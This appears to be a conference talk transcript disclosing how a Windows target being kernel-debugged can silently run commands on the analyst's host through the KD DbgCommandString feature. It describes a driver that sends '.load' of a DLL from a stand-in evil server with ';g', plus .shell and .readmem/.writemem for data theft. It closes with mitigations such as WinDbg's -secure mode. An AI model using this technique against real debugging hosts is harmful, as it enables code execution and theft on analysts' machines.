So my talk is called debugger-based to host cross-system attacks, which is a very long name. I couldn't find something shorter and fancier. So let me tell you what it's all about. So this talk is hopefully meant to shatter any hopes you might still have had that if you're debugging malware in a VM, you're safe because it's in a VM and it's isolated and your host is all good. It's also hopefully going to show you that even if you're debugging stuff on a remote machine, so even if it's not some process with a VM running on your machine, which obviously could be dangerous, even if it's on a remote machine, there's still ways to attack the host. And all this attack needs is a serial cable. So there's no network connection or anything like that. Obviously, there's some caveats that I'll get into. So as David introduced me, I'm Alex, and I basically eat Windows internals for breakfast, lunch, and dinner. So I teach about it, write code about it, and I worked on a project called ReactOS for 3 years. So I was the lead kernel developer of that project. So I wrote a lot of Windows kernel code that wasn't Windows, reverse engineered a lot of it, and that experience got me to interact with Mark Russinovich and David Solomon. And so I wrote co-wrote the Windows internals 5th edition book. And I also, like David said, I teach with David Solomon to Microsoft and other classes. I also am giving a training at REcon. So enough about me. What makes this actual attack work? So first of all, it only applies to Windows. So it is a Windows-specific attack. On the other hand, most malware that we analyze today is Windows. And it's specific to the KD protocol. So it requires you to be debugging the actual VM or the actual machine you're working with, which you typically do when you're analyzing something. But it's specific to KD. So if you're using WinBag, IDA over WinBag, or anything, IDA over KD, sorry, anything that uses the Microsoft KD protocol. The best thing about this attack is that it's not a bug. It's an actual feature. And I'll get back to that. So it's not something that could easily be fixed because it would break functionality that's being used internally. Recently, about 3 or 4 days ago, there was an article posted on Drew's blog saying that he had found some attacks in the debugger engine as well. Those attacks, although I'm not sure he actually found some exploitable code, but those attacks actually used parsing bugs and bugs in the protocol that could be fixed. This attack is really just a feature, as we're going to see. So the assumption here is that you're using something like WinBag or KD, the client, or IDA over KD, and you're analyzing some Windows machine over that protocol. So before talking for 30, 40 minutes about the internals of Windows and KD, I've often been accused of talking for half an hour about how Windows works and then doing demo. So I'm just going to do demo first, just to show you how this attack kind of works. I'm just going to disconnect and go on my Windows machine. So this is my VM. So I wrote a little driver. Basically, as we're going to see, this requires a driver on the target. That's what's going to execute the code. So I'm just going to load it. So this assumes that this driver either gets loaded by the executable malware or is loaded on startup. So somehow there's some rootkit on this machine that you're analyzing, which is the whole point. You're trying to figure out how this rootkit works, so you're analyzing it in a VM. And here's WinBag. So I'm going to prepare WinBag for connecting. And I'm just going to run the driver. And nothing should happen. It's dormant, waiting for a connection. And hopefully the demo gods are with me. WinBag will try to connect. And I'm going to break in. And it looks like the demo gods were not with me. Let's try that again. All right. Let's try breaking in again. There we go. So the exploit I wrote, thank you. So I wrote this pretty quickly, so there is slightly timing. I could have done it a little bit better. But basically, you connect, The idea is you connect, and now you have some random code that's executing. And this is just one example of what it can do. And as I'm going to talk about, you don't necessarily will have a visible exploit. So that's the really insidious thing about this attack is it's totally invisible. I obviously made it visible to show you, but I'll talk a little bit more about this attack and what exactly it meant. Also notice that when I actually tried to break in the second time, it didn't actually break in. So that's another thing I'll talk about. You can actually stop the host from even being able to debug you at all. So I'll start talking a little bit about KDE itself, what this protocol is. And so KDE stands for Kernel Debugger, and it's the internal protocol that Microsoft uses in all their products that support debugging with WinBag or KDE. So it's kind of weird. KDE is the protocol. KDE is also the command line application you use to debug over KDE. So this is very similar to GDB. In the Linux world, you have a GDB stub, you add it to your OS, and now you can debug that with GDB. In the Microsoft world, you have a KDE stub, you add that to whatever OS you're working on, and now you can connect that. There is actually one non-Microsoft product that uses KDE, ReactOS. A year ago, they actually added a KDE stub to that, and now you can use WinBag to debug ReactOS. They actually tried getting a dump with WinBag from ReactOS and sending it to Microsoft just to see how they'd react. So it's also highly portable, so they can add it to a lot of products. The interesting thing about KDE is that when you're connecting to a KDE host, because the protocol supports many kinds of different products, there's a field in the packet that says what kind of product are you connecting to. And I've often used that enumeration to basically see what are all the top secret projects Microsoft's working on. Because it's actually documented in the header files. It's called DBG KDE major types. In the first one, there's NT, so you know KDE works over NT. There's Xbox, so Xbox uses KDE as well when they debug it in the lab. Something called Big, which after reading a Mary Jo Foley blog, I realized was Microsoft Project Big Top, some abandoned cluster thing. EXDI is a hardware debug interface, so they can actually connect to. Whoa. So they can actually connect to hardware debuggers. TNT, I think that's supposed to be, the NTBD, sorry, is the bootloader, so you can actually use WinBag to debug the bootloader in Windows as well. EFI, I think Intel and Microsoft, since they created EFI together, there's a EFI stub that I guess if you work on EFI, you can connect to and debug the BIOS. TNT, I think, stands for TinyNT. It's what Windows CE uses. So Windows mobile phones, anything that uses Windows CE, you can use WinBag over it as well. Singularity, so that's that .NET-based operating system Microsoft's working on that supposedly some people think will replace Windows. Hyper-V can actually, this is not public, but internally they know how to debug the hypervisor itself with WinBag. And recently, it's not documented, but I tried fuzzing the command. So basically, I made up a virtual host and told WinBag, this is who I am. And there's a DBG KD major types max. So I tried doing what happens if I send it max. And what WinBag pasted was connected to Windows Midori, which is pretty interesting because Midori is apparently the next top secret Windows OS that's based on .NET. So Midori, whatever that is, also uses KDE. So the interesting thing about this is if there's a bug in KDE, theoretically, all these, as long as it's the same stub, all these different operating systems and products would also be vulnerable. I think I actually have, see if I can alt-tab safely in Chrome. Okay, that did not work. Oh, that worked. So in ReactOS, there's actually so in the Windows 2000 development kit, Microsoft actually released part of the debug headers by accident. And that's this WDGX file. And so here's the enumeration I was talking about, DBG KDE major types. So that's where that comes from. So the other great thing about KDE is that it's completely portable. So it actually works over x86, it works over AMD 64, it works over Itanium, Alpha, ARM, MIPS, EFI bytecode, and PowerPC. So it also works across a variety of different architectures. At the base, KDE implements some very basic commands like reading, writing to memory, accessing the bus, accessing the I/O registers, accessing control space, accessing CPU MSRs, context breakpoints, the same thing you'd expect from any debugger. But it also has some interesting higher level functionality like searching some for value memory. So instead of getting a memory dump on your machine and having the host search for it, you can just have the target host search for the memory itself, switching between processors, paging in memory, etc. So all this communication uses what's called a KD packet. So it's this packet structure. It's documented in a couple of places on the internet, including in the ReactOS headers. And there's different kinds of packet types. So all the examples I had before, like reading, writing memory on the previous slide, those are called state manipulation packets. So when you're changing something about the system state. You can also manipulate something. You can also have a state change. These are things like exceptions, module load, symbol load, and unload, file I/O, tracing I/O, and debug I/O. So these are some higher level kinds of commands that KD supports. You also have what are called KD control packets. And these are the packets that actually build the communication. So there's a packet to break in the machine, a packet to acknowledge any command, a resend packet, and a reset packet. So it's a very basic wire communication protocol. Every packet has a header. And so this is a data packet, so a packet that has a state change or I/O or tracing or debugging. You get a packet leader, so that starts with 0000, and a control packet that starts with I in hex. And a break-in packet is BBBB. So actually for fun, if you know a machine's being debugged, if you know a machine is boot in debug mode, you plug in a serial port, you go BBBB, it'll just crash because it thinks you're trying to break in. It's going to wait for you to connect to it. So what happens next is that there's a packet ID. So just like in most communication protocols, the host expects a certain packet ID. The target sends a certain packet ID. And if the ID doesn't match, the host or the target will say, I must have lost a packet. Let's start the whole thing over. And they resync, or they ask for a resend. Every packet also has a checksum. It's very simple. You just add up all the bytes continuously in the packet, and that's your checksum. And the packet has a trailing byte, so you know where the packet is finished. So you look at the length, you add that to the packet, and if the ending is not AA, then you know this is not a real packet. So most of this logic is, the people looked at this, and there doesn't seem to be any bug in the packet logic handling. So you can try fuzzing this. It's pretty secure. If winback doesn't like a packet, it'll just ask for another one back. So when a command does get sent and is accepted, it's parsed, processed, the operation is performed, and then an acknowledged packet is sent. And then you wait for the acknowledged to have been delivered. Now, KD itself works over many communication protocols or wires. So it works over serial. It works over FireWire. It works over USB 2.0 if you're using Vista or later, if you have a special cable. And in Windows 7, it actually works over TCP/IP as well. If you have special kinds of Realtek network cards, those will actually work. I wouldn't recommend debugging over TCP/IP. I always say this because it means that essentially anyone in the network can start debugging that machine. KD doesn't have any SSL or any authentication. If you know how to speak KD, you get in the machine. So over the network, you want that to be on a closed network. And the nice thing about serial KD debugging is you can do it over a named pipe. So that allows you to do it over a virtual machine, for example. Now, additionally, all these different wires, all these different pipes, communication pipes, are implemented in a KD extension DLL. So when the kernel loads, it'll load KD-COM or KD IEEE 1394 or KD USB or KD-NET, depending on what you've configured the machine to be debugging over. And then there's some APIs in the kernel that will communicate with this extension DLL. And these provide some simple APIs like send packet, receive packet, and wait for break-in. If you want more information on KD, at the end I put some websites up. There's been some people who've analyzed it pretty thoroughly, and there's also source code in ReactOS that I'll mention. So now let's see what happens when we talk about the host. So KD, the host side protocol, so what you're using on your host to talk over KD, is actually implemented in what's called a debug engine. So debug eng.dll, which is loaded by KD and WinBag and even IDA. That's what actually implements the KD protocol. And theoretically, anyone could just implement KD from their own application. Although it tries to kind of protect in a very weird way. If you're trying to use kernel debugging by calling debug engine API. If in your resource file you don't have a driver called KLDBGDRV, which only Winback has, it's going to say you're not allowed to do that. So obviously you take your executable, you add that, and then you're okay. I don't really get the point of that. So that allows you to do KD from any app. It also means that any app that uses KD is vulnerable because the code isn't there. So KD is often used for debugging Windows, and so parts of KD have been extended to make it easier to debug specific scenarios. So for example, KD actually has entire APIs to send a file or to receive a file, which are useful when you're trying to override a driver on a target. Things for searching data and memory. But the strange thing about KD is that it also allows the target to communicate with the host. Now, one of the most benign target-to-host communications is debug print. In debug print, basically, a driver or a user mode app on a target does a debug print with a string. That string shows up in a debugger. That's not a big deal. Almost all debuggers have this, kprintf, etc. So you see a string. The slightly more stranger one is debug prompt. Debug prompt allows the target to ask the host for something. And it basically breaks your debugging session. And now there's a prompt, and you have to respond to that before continuing to debug. Which could be used to annoy you, I guess. The malware is constantly prompting you, go away, and you have to type something. But it's pretty benign as well. You can ignore these exceptions, and it's not a big deal. We'll see what the third one, which is a big deal, is a little bit later. So Winback itself has a command set that maps on top of KD, and those are called the naked or the built-in commands. So things like dd, dump data, ed, edit data, those get packaged into a KD packet that says write data, and that just gets sent to the host. It also has what are called dot commands, like .if, .crash, .help, .dump. These are things that let you do scripting, provide some extra functionality, and some more complex helpers. So these are slightly more advanced commands. On top of all that, Winback has loadable extensions. So you can write an extension DLL, and that will give you a bang command, like bang process, bang list, bang thread. These are either implemented in box, so someone at Microsoft wrote the extension, or third parties can write extensions as well. So an SDK is provided, and you can write your own. And then you load an extension with .load. So now you can get your own code to execute within Winback. These commands are the kinds of commands that give you advanced and complex manipulation of the OS, data structures, and helper macros, like bang list will enumerate a whole list of things in the OS for you. Interestingly, if you look at the KD command set, there's some dot commands that are kind of strange to have in a debugger, in my opinion. .shell, for example, will pop up a command prompt and let you use the debugger to type in any command you want in the shell. .net use will have Winback map any network drive you want. .quitlock will let you set a password, and if you try to quit the debugger without that password, it won't let you. I have no idea why that exists. And .read and .write mem let you take a file and dump it into target's memory, or you take something from a target's memory and dump it into a file, which is also a little bit strange. So good thing you have to type these commands, right? Because imagine if someone could use a .net use z:evil server and then a .load z:evil.dll. Now you've just loaded some arbitrary piece of code. And actually .load works with UNC paths. You don't even need to map the network drive. You can just do .load evilserver.com/evilDLL.dll. The most wonderful thing about .load is once you've loaded that DLL, every time you launch Winback again and connect to that host, Winback knows, oh, last time you loaded that DLL, let me load it for you again. So in the debug version of the ACPI driver, Microsoft has an ACPI markup language interpreter debugger called the AMLI debugger. So you have some ACPI code that the motherboard manufacturer wrote, and you can debug it. And then there's a Winback bang ACPI extension that lets you interact with the debugger. So your commands now will go to acpi.sys. acpi.sys will tell you something. You can actually step through ACPI code and do things like that. So at this point, you might be wondering, is this a talk on ACPI? No. So why is that relevant? Well, it turns out that the ACPI debugger, it needs a way to send data back to you and sometimes even send some commands back to you. Like let's say you're telling the ACPI debugger to dump some ACPI object, well, it'll send you back a command that it'll execute on your behalf to dump that object. So Microsoft has an API that lets you do that. Debug command string. So the host calls debug command string, and that takes 2 parameters. Sorry, the target calls debug command string and has 2 parameters. The name, to basically say who is sending this command, but that name is never shown anywhere, and then the command itself. And then this gets packaged into a KD packet, gets sent to the debug engine, and the debug engine will then execute this command as if you have typed it. This is a major fail for one big reason, is that this command is not echoed out to you. Because it's interpreted and executed internally, you have no idea that this command is being executed. And the idea is the ACPI debugger doesn't want your screen to be filled out with the random garbage. You just want to see the output. So it's going to hide that from you. But thankfully, there's a dbg eng log. There's a log in the debug engine that shows you all commands that have been executed. It turns out that that log specifically checks if this is a command that was sent remotely and will not log that command. However, when you do that command, because it has a built-in breakpoint, if someone does send a debug command string, even though you don't see what the command was, your debugger will break on debug command string. So you'll know someone sent a command string. So the ACPI folks figured this out. So they were having this nice little ACPI debugger. They would send a command back, and then the debugger would always break. So they just added :G at the end of their command string. Because it turns out that WinBag takes the command string and separates it into commands, separated by semicolons. It then executes the first token. So whatever the command is, it executes it. Then it breaks to tell you that a command executed. And then it executes the rest of the tokens. And so G is go in WinBag lingo. And so you just send a command packet with semicolon G. WinBag is going to break, but then the next command is go, so it's actually not going to break, and just silently execute that command for you. So from an attack perspective, all you need to do is call debug command string, give it a string, and have WinBag execute it. But there's still some caveats to that. You'll still see debug WinBag breaking and then starting again. And that still requires you to kind of know when to actually send the command string. So what if we could, not attach, sorry, what if we could attack WinBag as it's attaching and also try to prevent it from breaking in at all? So this way, we're launching a remote code on your machine, and we're also not letting you debug the malware. So when WinBag connects, opens, and you set it to connect, it tries to connect to the target. And at boot time, this usually works pretty well. There's a built-in breakpoint, and now you've broken into the kernel. The machine's already booted. When you connect WinBag, typically nothing happens. It just says waiting for connection, and then you have to press the little pause button. When you send pause, WinBag then sends a break-in packet. So as WinBag is trying to connect, it's sometimes able to also exchange a connection packet. So WinBag will sometimes be able to tell the host, the target I'm connecting, get some information. That's when you see connected to Windows whatever, system uptime, system path, and WinBag appears as if it's connecting. But if it hasn't actually been able to break in, it won't actually break. So it'll still be running, and it'll basically be in a state where it's analyzing the remote system as it's running without having broken into it. But when it is in a state, WinBag is connected. And so therefore, it accepts any commands that are coming from the host, from the target. So if you get WinBag in a state, you haven't broken in, but WinBag is still happily letting you send it command strings. So let's make an attack. So basically, you create a driver, and then you wait for WinBag to connect. And you use the same exported API that the kernel uses, which is KD pull breakin. So you do a while true loop or something more fancy than that. That just asks the kernel debugger serial DLL or whatever DLL you're using, has the debugger broken in? Is the debugger trying to break in? And this will return true at some point when WinBag is trying to connect. But then what I do is I wait 2 to 3 seconds. Obviously, you can enhance this, make it more reliable. And then you send your command string. .load the evil DLL, and then go. And so what happens is WinBag is breaking in, and it's connecting. Oh, I have a command to execute. It loads that DLL. And then instead of breaking in, because you put G, it just continues executing. So as you saw during demo, I wasn't broken in. I just had a message box that popped up, and I couldn't break in. And you don't see anything in WinBag. You don't see that there was a dot load. Unless you're analyzing the serial line, you don't see at all that this command was sent to your machine. Even if you look in the internal logs, it's nowhere. So what happens? Well, like I said, WinBag tries to break in, and your driver has to catch that. The great thing is that if this DLL is somewhere local, so instead of doing it basically remotely, you could make a more advanced version in which you write, you have your DLL code somewhere in memory, and you use the write mem to write it to a file somewhere on the host. And then you use a .load a local path, and that will guarantee that any time the user tries to connect to this machine ever again, that your arbitrary code will execute because it's been saved locally on a machine. So you can do a whole bunch of things with this. You can use a .shell to just open a shell and launch any commands you want on a shell. You can do a privacy attack. So there's a read mem command, which lets you take any file on the host and read it into the target's memory. So if you want to steal some data, you can do that. With write mem, you can take any memory in the in the target and write it into a file on the host. So you can drop custom DLLs. You can also be really, really annoying and block the user from debugging the target. So every time the user tries to break in, you steal the break-in packet and you ignore it, or you just type go. He breaks in, you say go. He breaks in, you say go. And so he's never able to break in. Or if you really want to be annoying, you do a quit stop and you set a password. The user doesn't see the password, and now he can't break in. He can't quit WinBag because WinBag's always going to ask, what's the password? Obviously, you can open Task Manager and kill it that way, but I'd be really annoyed if I have to put a password and I'm trying to quit attacking a piece of malware. So I presented the VM as an idea because it's what we often use a lot to analyze things in a more secure environment, to load kernel drivers. But it doesn't have to work over a VM. This will work over anything you're using KD with. So if you have a FireWire serial cable and you connect it to a remote machine, and that remote machine sends you a command string, your machine will execute that. And because this thing runs on so many other Microsoft operating systems, here's some nice ideas. Root your Zune. I don't know if that's possible, but if you could, put a driver on it that sends the DBG command string, and then bring it in for repair. And then I don't know what the Zune repair shop does, but if they try to use the debugger to see what's wrong, they plug it in, bam, your code starts executing. That'll be harder because obviously Zune is ARM. Their machine will probably be x86, so you're going to have to write some x86 code, but theoretically you could do this kind of attack. Or any Windows Mobile 7 phone. Actually, any Windows Mobile phone. They're all Windows CE phones. If anyone ever tries to debug with the debugger, bang, your code runs. Same thing with the Xbox or the Xbox 360. If it's really damaged and they try to connect the debugger to it, so anything that basically uses this protocol is insecure. So biggest question is, what can you actually do to protect against this? So there's two things. One of them is pretty obvious, and that thing is just to limit WinBag. Because whatever command you execute, it's still executed by WinBag. And so as long as you're not running WinBag as admin, whatever command is typed won't have admin privileges. Now, that doesn't fully protect you. You don't need to be admin to own the machine. So that code can still steal your files, can still execute code in your user account, but it limits a little bit. So if you want to create a special account for debugging, something like WinBag no access, where all you use is WinBag in that account, that'll protect you a little bit more. Unfortunately, WinBag needs admin access for local debugging, and also if you're going to debug WinLog or other things, you do need admin access. So most people do run WinBag with admin access. A lot of people do that. There's a better solution. It turns out that WinBag has something that's called secure mode. So someone in WinBag land probably at one point thought, it's probably not a very good idea to have network drive mapping and execution and shell commands in a debugger. And so they added a .secure command that is not really advertised anywhere. And if you do a .secure, that will enable the so-called secure mode. And in secure mode, it disables .NET use. It disables .load with anything than a local path. It disables .readmem and .writemem. It disables .shell. It also disables symbol extension DLLs. It disables pretty much what Microsoft thinks are things that can attack the host. But ironically, it also disables you from attaching from the process or the kernel, from attaching to something else. So it also kind of limits in what you can do. Thankfully, .secure, once you enable it, can't be turned off anymore. Because at first, I saw there was a .secure 1, which enables it, and so I thought, oh no, please don't tell me .secure 0 disables it, because then my packet will just send a .secure 0. Turns out that once it's enabled, you can't disable it anymore. So how do you actually put in .secure though? Because the idea is you're connecting to you don't actually have anything to type in until you're connected. So you probably don't want to type .secure because by then you've already connected to the remote machine. And so there's a command line option. And so from now on, when you start WinBag, start it with -secure. So if you start a WinBag with -secure, it'll start in secure mode. Now if you do this though, like I said, you can't attach to processes or detach or open a crash dump. So this is pretty much only usable if you're going to do remote debugging. So anytime you do, so make yourself 2 shortcuts if you use WinBag or 2 ways of executing it. You're going to do remote debugging, -secure. You're going to do local debugging, no -secure, because then you're just doing local stuff. So if you're interested in more things about KD, there's some pretty interesting things you could do with it. One idea that I've been thinking of doing is to get a process and basically put the KD stub inside it over a named pipe. And now you can get WinBag to basically connect to your process as if that process is a remote machine. And then you can get KD packets. So I've been thinking about doing that for fuzzing and also for just providing a neat little way to debug an application as if it was a VM in a way. There's some application techniques that actually turn your executable into a little micro OS with its own VM. So you could put a KD stub in there and have an executable being debugged by WinBag as if that was a machine itself. So if you do want more information about KD and all the commands that exist, there's hundreds of them. If you're interested in fuzzing this thing, I'm sure there's bugs. As I said, Juru on his blog, if you just search for G00RU, he has some analysis of actual packet parsing bugs. So not features like this, but actual bugs. When you send a malformed packet, the debug engine can sometimes leak memory from the host. So either if you get the Windows 2000 DDK or ReactOS, which you can easily get on the internet, windbgkd.h has all the definitions of up to Vista, what are all the KD packet types, the command modes, the APIs that can be used, and they're pretty well documented. It doesn't have any, I don't know if there's any new Win7 commands. It doesn't have those because those haven't shown up publicly anywhere. The AMD 64, so the 64-bit port of ReactOS has an actually fully implemented KD stub. So it actually has the KD DLL, that same one, compatible one with what Microsoft uses. KD VMware is a product by, I think, called sysprogs. Basically, if you debug over VMware with KD, you're using a named pipe. KD still thinks this is a serial port, so it's not going to send data at more than 115 kilobits per second, which is really slow. And so what KD VMware does is it goes in VMware's memory and gets the basically creates a 5th kind of KD communication channel. Instead of using serial port, it pumps data directly into VMware and gets it back from VMware. So if you're going to do dumps over VMware, any commands that need a lot of data, I do recommend you use this. But of course, he had to document the whole KD protocol. He had to implement his own KD DLL. So there's a lot of interesting documentation there as well. And Ken Johnson, which works at Microsoft now, aka Skywing, he has his blog up too, and he also wrote some KD information. He had actually written a similar tool to KD VMware. I'm not sure if he still has it on his site after being acquired by Microsoft. KD VMware also has a KD proxy. So basically, you load that, and you can see all the KD commands that are being sent across a debugging session. So if you actually had that loaded, you would see the debug string being sent from the target to the host.